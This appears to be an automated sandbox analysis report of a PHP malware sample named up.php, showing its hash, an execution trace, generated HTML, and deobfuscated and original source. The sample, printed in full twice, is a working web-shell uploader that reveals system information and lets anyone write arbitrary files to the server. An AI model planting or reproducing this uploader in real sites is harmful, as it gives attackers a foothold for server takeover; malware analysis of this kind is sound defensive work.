PHP Malware Analysis

up.php

md5: eb9ed4e08d34a8dd6a5d09bb88d39e25

Jump to: 

Screenshot
Attributes
Environment

Files

Input

Deobfuscated PHP code
<?php

echo '<b>SecurityBus<br><br>' . php_uname() . '<br></b>';
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">";
echo "<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>";
if ($_POST['_upl'] == "Upload") {
    if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
        echo "<b>Upload Success !!!</b><br><br>";
    } else {
        echo "<b>Upload Fail !!!</b><br><br>";
    }
}
Execution traces
data/traces/eb9ed4e08d34a8dd6a5d09bb88d39e25_trace-1676258300.4539.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:18:46.351815]
1	0	1	0.000238	393464
1	3	0	0.000300	395856	{main}	1		/var/www/html/uploads/up.php	0	0
2	4	0	0.000316	395856	php_uname	0		/var/www/html/uploads/up.php	2	0
2	4	1	0.000331	395968
2	4	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1	3	1	0.000369	395856
			0.000396	314200
TRACE END   [2023-02-13 01:18:46.352008]


Generated HTML code
<html><head></head><body><b>SecurityBus<br><br>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64<br></b><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form></body></html>
Original PHP code
<?php
echo '<b>SecurityBus<br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
	if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }
	else { echo '<b>Upload Fail !!!</b><br><br>'; }
}
?>